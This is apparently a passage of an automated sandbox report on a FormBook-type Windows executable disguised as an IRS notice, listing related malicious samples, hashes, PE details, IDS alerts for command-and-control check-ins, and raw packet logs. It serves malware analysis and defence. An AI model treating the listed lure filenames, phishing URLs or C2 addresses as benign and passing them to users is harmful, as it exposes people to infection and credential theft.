                                                                          148wWoi8vI.exeGet hashmaliciousBrowse
                                                                          • 153.120.92.156
                                                                          rJz6SePuqu.dllGet hashmaliciousBrowse
                                                                          • 133.242.119.241
                                                                          https://nishimurakoumuten.com/assets/images/wood/outlookexpress/index.php%3Femail=Get hashmaliciousBrowse
                                                                          • 153.120.48.160
                                                                          PI10943.exeGet hashmaliciousBrowse
                                                                          • 153.126.199.188
                                                                          3yhnaDfaxn.exeGet hashmaliciousBrowse
                                                                          • 153.127.37.14
                                                                          CLOUDFLARENETUSSecuriteInfo.com.Exploit.Rtf.Obfuscated.16.5396.rtfGet hashmaliciousBrowse
                                                                          • 162.159.130.233
                                                                          n#U00b0 761.docGet hashmaliciousBrowse
                                                                          • 162.159.133.233
                                                                          SecuriteInfo.com.Variant.Graftor.893032.186.exeGet hashmaliciousBrowse
                                                                          • 104.31.70.209
                                                                          imagnpdf0440690129912239vistaprevia02052329503adobeplayer02304293.exeGet hashmaliciousBrowse
                                                                          • 104.23.98.190
                                                                          SEA LION LOGISTICS-URGENT QUOTATION.exeGet hashmaliciousBrowse
                                                                          • 23.227.38.74
                                                                          R1G9cMpG36BO2Sg.exeGet hashmaliciousBrowse
                                                                          • 172.67.188.154
                                                                          099898892.exeGet hashmaliciousBrowse
                                                                          • 23.227.38.74
                                                                          Invoice #756-77988-23989646.exeGet hashmaliciousBrowse
                                                                          • 104.27.138.99
                                                                          e-card.htm .exeGet hashmaliciousBrowse
                                                                          • 104.27.201.87
                                                                          e-card.jpg .exeGet hashmaliciousBrowse
                                                                          • 104.27.201.87
                                                                          QyS0Q13lBd.exeGet hashmaliciousBrowse
                                                                          • 104.31.71.209
                                                                          SEe64c0h6A.exeGet hashmaliciousBrowse
                                                                          • 172.67.188.154
                                                                          b88rKzKJmJ.exeGet hashmaliciousBrowse
                                                                          • 104.28.5.151
                                                                          36bjGck9ps.exeGet hashmaliciousBrowse
                                                                          • 104.28.5.151
                                                                          _00AC0000.exeGet hashmaliciousBrowse
                                                                          • 172.67.218.107
                                                                          BitTorrent.exeGet hashmaliciousBrowse
                                                                          • 104.18.87.101
                                                                          Quotation.exeGet hashmaliciousBrowse
                                                                          • 172.67.188.154
                                                                          6hE7zSMErZ.exeGet hashmaliciousBrowse
                                                                          • 172.67.188.154
                                                                          24D004A104D4D54034DBCFFC2A4.EXEGet hashmaliciousBrowse
                                                                          • 104.16.173.80
                                                                          60RaZHDpvI.exeGet hashmaliciousBrowse
                                                                          • 104.28.5.151
                                                                          BODIS-NJUSmQFXD5FxGT.exeGet hashmaliciousBrowse
                                                                          • 199.59.242.153
                                                                          099898892.exeGet hashmaliciousBrowse
                                                                          • 199.59.242.153
                                                                          ZIPEXT#U007e1.EXEGet hashmaliciousBrowse
                                                                          • 199.59.242.153
                                                                          990109.exeGet hashmaliciousBrowse
                                                                          • 199.59.242.153
                                                                          SAWR000148651.exeGet hashmaliciousBrowse
                                                                          • 199.59.242.153
                                                                          SHIPPING INVOICEpdf.exeGet hashmaliciousBrowse
                                                                          • 199.59.242.153
                                                                          https://www.chronopost.fr/fclV2/authentification.html?numLt=XP091625009FR&profil=DEST&cc=47591&type=MASMail&lang=fr_FRGet hashmaliciousBrowse
                                                                          • 199.59.242.153
                                                                          IRS Notice Letter.exeGet hashmaliciousBrowse
                                                                          • 199.59.242.153
                                                                          IRS Notice Letter.exeGet hashmaliciousBrowse
                                                                          • 199.59.242.153
                                                                          Payment Order Inv.exeGet hashmaliciousBrowse
                                                                          • 199.59.242.153
                                                                          h3dFAROdF3.exeGet hashmaliciousBrowse
                                                                          • 199.59.242.153
                                                                          kqwqyoFz1C.exeGet hashmaliciousBrowse
                                                                          • 199.59.242.153
                                                                          file.exeGet hashmaliciousBrowse
                                                                          • 199.59.242.153
                                                                          PByYRsoSNX.exeGet hashmaliciousBrowse
                                                                          • 199.59.242.153
                                                                          3Y690n1UsS.exeGet hashmaliciousBrowse
                                                                          • 199.59.242.153
                                                                          Purchase_Order_39563854854.xlsxGet hashmaliciousBrowse
                                                                          • 199.59.242.153
                                                                          SOA121520.exeGet hashmaliciousBrowse
                                                                          • 199.59.242.153
                                                                          googlechrome_3843.exeGet hashmaliciousBrowse
                                                                          • 199.59.242.153
                                                                          cap.exeGet hashmaliciousBrowse
                                                                          • 199.59.242.153
                                                                          Order_009.xlsxGet hashmaliciousBrowse
                                                                          • 199.59.242.153

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          No created / dropped files found

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):5.479105905973935
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                          • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:IRS Notice Letter pdf document.exe
                                                                          File size:106496
                                                                          MD5:3fc4d64f320d7fae4bb46f6a735ab853
                                                                          SHA1:b77666ebd649350f21ee41e0e902c9b95e008e3c
                                                                          SHA256:ec8b3d104a7fc416aab07329a5f0ecab1b7fd181ffbd2d7ac31af51e532add07
                                                                          SHA512:7a15f684bda2af29dce7b23c1a0b933c4ad151525c8200c7a43b82a3ac3bb30bed210c172727724300fa96fcf7ed2bedffca9c0e93bcea6f7d56bd21852d4d7e
                                                                          SSDEEP:768:Z1eiH1VLA0mvOKGIb5kUCzPyDyAtaMrXBjSMW7gMlNVGih7sZyjYrfLXgCBe57oP:6s1lmOKGIt0zPyDTrR2gwteDANfsO8
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......_.................p...0....................@................

                                                                          File Icon

                                                                          Icon Hash:e0c4c26270faec04

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x401490
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                          DLL Characteristics:
                                                                          Time Stamp:0x5FFB81EA [Sun Jan 10 22:38:34 2021 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:731c57e7140be6290e90c27b6e4da29c

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          push 004019C8h
                                                                          call 00007F4F98DED4C3h
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          xor byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          inc eax
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [ecx-0C8E2B36h], cl
                                                                          jecxz 00007F4F98DED4F7h
                                                                          dec edi
                                                                          movsd
                                                                          sahf
                                                                          sar byte ptr [edi+02441594h], 1
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add dword ptr [eax], eax
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          fcomp dword ptr [edi+525003EAh]
                                                                          dec edi
                                                                          inc esp
                                                                          push ebp
                                                                          inc ebx
                                                                          push esp
                                                                          dec ecx
                                                                          inc esp
                                                                          add byte ptr [ecx+00h], al
                                                                          and byte ptr [eax], cl
                                                                          inc ecx
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add bh, bh
                                                                          int3
                                                                          xor dword ptr [eax], eax
                                                                          pop es
                                                                          fdiv dword ptr [eax]
                                                                          aas
                                                                          pop esi
                                                                          adc ebp, esi
                                                                          and ecx, dword ptr [esi-48h]
                                                                          ret
                                                                          into
                                                                          fisub word ptr [eax]
                                                                          fsubr qword ptr [edi-41EC53F5h]
                                                                          xchg eax, esp
                                                                          push esp
                                                                          or bl, byte ptr [ebp-46F775BFh]
                                                                          jnc 00007F4F98DED542h
                                                                          pop ss
                                                                          stosd
                                                                          cmp edi, dword ptr [edx]
                                                                          dec edi
                                                                          lodsd
                                                                          xor ebx, dword ptr [ecx-48EE309Ah]
                                                                          or al, 00h
                                                                          stosb
                                                                          add byte ptr [eax-2Dh], ah
                                                                          xchg eax, ebx
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          test byte ptr [eax+eax], al
                                                                          add byte ptr [ebx+03h], dl
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], cl
                                                                          add byte ptr [edx+edx*2+49h], dl
                                                                          inc esi
                                                                          dec ecx
                                                                          dec esp
                                                                          inc ecx
                                                                          push edx
                                                                          add byte ptr [6E000901h], cl
                                                                          outsd
                                                                          outsb
                                                                          imul esi, dword ptr [edx+65h], 0000006Eh

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x16b940x28.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a0000x5fc.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x118.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x1607c0x17000False0.357687245245data5.86532727168IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                          .data0x180000x11d40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x1a0000x5fc0x1000False0.15673828125data1.4944441595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountry
                                                                          RT_ICON0x1a3140x2e8data
                                                                          RT_GROUP_ICON0x1a3000x14data
                                                                          RT_VERSION0x1a0f00x210dataEnglishUnited States

                                                                          Imports

                                                                          DLLImport
                                                                          MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaCastObjVar, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaI2Var, _CIlog, __vbaErrorOverflow, __vbaNew2, __vbaVarLateMemCallLdRf, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaVarSetObj, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaInStrB, __vbaVarDup, __vbaStrComp, __vbaVarLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                                                          Version Infos

                                                                          DescriptionData
                                                                          Translation0x0409 0x04b0
                                                                          InternalNameklogelig
                                                                          FileVersion2.00
                                                                          CompanyNameSperry
                                                                          ProductNameSperry
                                                                          ProductVersion2.00
                                                                          OriginalFilenameklogelig.exe

                                                                          Possible Origin

                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishUnited States

                                                                          Network Behavior

                                                                          Snort IDS Alerts

                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                          01/11/21-16:24:11.818810TCP1201ATTACK-RESPONSES 403 Forbidden804973234.102.136.180192.168.2.4
                                                                          01/11/21-16:24:32.693470TCP1201ATTACK-RESPONSES 403 Forbidden804973434.102.136.180192.168.2.4
                                                                          01/11/21-16:24:48.117662TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.4172.67.209.95
                                                                          01/11/21-16:24:48.117662TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.4172.67.209.95
                                                                          01/11/21-16:24:48.117662TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973580192.168.2.4172.67.209.95
                                                                          01/11/21-16:24:53.322417TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.434.102.136.180
                                                                          01/11/21-16:24:53.322417TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.434.102.136.180
                                                                          01/11/21-16:24:53.322417TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.434.102.136.180
                                                                          01/11/21-16:24:53.460948TCP1201ATTACK-RESPONSES 403 Forbidden804973634.102.136.180192.168.2.4
                                                                          01/11/21-16:25:14.508003TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.4147.255.30.94
                                                                          01/11/21-16:25:14.508003TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.4147.255.30.94
                                                                          01/11/21-16:25:14.508003TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.4147.255.30.94
                                                                          01/11/21-16:25:20.495931TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973880192.168.2.4153.126.209.136
                                                                          01/11/21-16:25:20.495931TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973880192.168.2.4153.126.209.136
                                                                          01/11/21-16:25:20.495931TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973880192.168.2.4153.126.209.136
                                                                          01/11/21-16:25:25.984778TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973980192.168.2.4216.58.207.179
                                                                          01/11/21-16:25:25.984778TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973980192.168.2.4216.58.207.179
                                                                          01/11/21-16:25:25.984778TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973980192.168.2.4216.58.207.179
                                                                          01/11/21-16:25:36.900513TCP1201ATTACK-RESPONSES 403 Forbidden804974034.102.136.180192.168.2.4

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 11, 2021 16:23:14.375580072 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:14.563386917 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.563558102 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:14.564799070 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:14.758521080 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.758580923 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.758625031 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.758665085 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.758698940 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:14.758702040 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.758730888 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:14.758744001 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.758759975 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:14.758786917 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.758820057 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:14.758835077 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.758881092 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.758882999 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:14.758919954 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.758949041 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:14.759027958 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:14.946043015 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.946077108 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.946147919 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:14.946213007 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:14.946422100 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.946446896 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.946468115 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.946490049 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.946505070 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:14.946583033 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:14.946628094 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.946654081 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.946674109 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.946696997 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.946721077 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:14.946799040 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:14.946938038 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.946963072 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.946984053 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.947024107 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:14.947087049 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:14.947099924 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:14.947187901 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.133243084 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.133299112 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.133335114 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.133336067 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.133371115 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.133378029 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.133419991 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.133435965 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.133441925 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.133502960 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.133507967 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.133548975 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.133574963 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.133588076 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.133613110 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.133629084 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.133656025 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.133667946 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.133692980 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.133708000 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.133737087 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.133745909 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.133774042 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.133785963 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.133814096 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.133840084 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.133867025 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.133878946 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.133914948 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.133924007 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.133958101 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.133964062 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.133992910 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.134006977 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.134032965 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.134046078 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.134073973 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.134084940 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.134109974 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.134123087 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.134147882 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.134160995 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.134202957 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.134213924 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.134218931 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.134253979 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.134284973 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.134330034 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.323026896 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.323076963 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.323112011 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.323113918 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.323137045 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.323149920 CET8049730198.187.29.67192.168.2.4
                                                                          Jan 11, 2021 16:23:15.323164940 CET4973080192.168.2.4198.187.29.67
                                                                          Jan 11, 2021 16:23:15.323188066 CET8049730198.187.29.67192.168.2.4

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 11, 2021 16:22:40.501429081 CET5170353192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:22:40.558036089 CET53517038.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:22:41.734980106 CET6524853192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:22:41.782879114 CET53652488.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:22:43.079816103 CET5372353192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:22:43.127841949 CET53537238.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:22:44.754998922 CET6464653192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:22:44.802923918 CET53646468.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:22:48.201880932 CET6529853192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:22:48.249973059 CET53652988.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:22:50.577884912 CET5912353192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:22:50.634222984 CET53591238.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:22:51.736870050 CET5453153192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:22:51.784784079 CET53545318.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:22:52.901640892 CET4971453192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:22:52.952630043 CET53497148.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:22:54.162101984 CET5802853192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:22:54.219430923 CET53580288.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:22:55.313086987 CET5309753192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:22:55.360910892 CET53530978.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:22:56.570456028 CET4925753192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:22:56.621493101 CET53492578.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:22:57.768143892 CET6238953192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:22:57.827384949 CET53623898.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:22:59.401148081 CET4991053192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:22:59.448834896 CET53499108.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:23:14.129580021 CET5585453192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:23:14.350569010 CET53558548.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:23:29.520019054 CET6454953192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:23:29.568088055 CET53645498.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:24:06.476883888 CET6315353192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:24:06.545897961 CET53631538.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:24:11.567560911 CET5299153192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:24:11.634740114 CET53529918.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:24:21.866880894 CET5370053192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:24:22.008053064 CET53537008.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:24:27.274300098 CET5172653192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:24:27.434158087 CET53517268.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:24:32.450069904 CET5679453192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:24:32.512212992 CET53567948.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:24:37.728318930 CET5653453192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:24:37.877690077 CET53565348.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:24:42.882637978 CET5662753192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:24:42.963098049 CET53566278.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:24:47.984529972 CET5662153192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:24:48.069564104 CET53566218.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:24:53.202550888 CET6311653192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:24:53.279584885 CET53631168.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:24:58.479343891 CET6407853192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:24:58.557437897 CET53640788.8.8.8192.168.2.4
                                                                          Jan 11, 2021 16:25:03.605534077 CET6480153192.168.2.48.8.8.8
                                                                          Jan 11, 2021 16:25:03.811801910 CET53648018.8.8.8192.168.2.4
